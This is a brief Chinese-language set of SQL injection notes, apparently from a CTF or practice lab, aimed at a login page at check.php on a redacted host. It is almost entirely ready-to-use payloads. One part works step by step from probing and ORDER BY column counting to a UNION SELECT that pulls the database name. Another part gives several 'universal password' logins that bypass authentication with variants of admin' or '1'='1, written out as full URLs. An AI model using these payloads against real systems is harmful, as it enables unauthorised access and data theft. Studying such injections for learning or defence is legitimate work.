1.常规方法

  1. payload:?username=admin&password=1
  2. payload:?username=admin&password=6-5 //判断页面是否相同
payload:?username=admin&password=1' order by 3%23
payload:?username=admin&password=1' order by 4%23


构造注入语句
payload:?username=admin&password=1' union select 1,2,database()%23

 

 

 

 

2.万能密码

admin' or '1'='1
payload:  ?username=admin' or '1'='1&password=123456789' or '1'='1 

或者 

?username=admin' or '1'='1&password=admin' or '1'='1' %23 
http://xxx.cn:81/check.php?username=admin' or '1'='1&password=admin' or '1'='1' %23 

?username=username=admin' or '1'='1&password=admin' or '1'='1 
http://xxx:81/check.php?username=username=admin' or '1'='1&password=admin' or '1'='1 

?username=username=admin' or '1'='1&password=admin' or '1'='1' %23 
http://xxx.cn:81/check.php?username=use&password=admin' or '1'='1' %23


?username=use&password=admin' or '1'='1' %23
http://xxx.cn:81/check.php?username=use&password=admin' or '1'='1' %23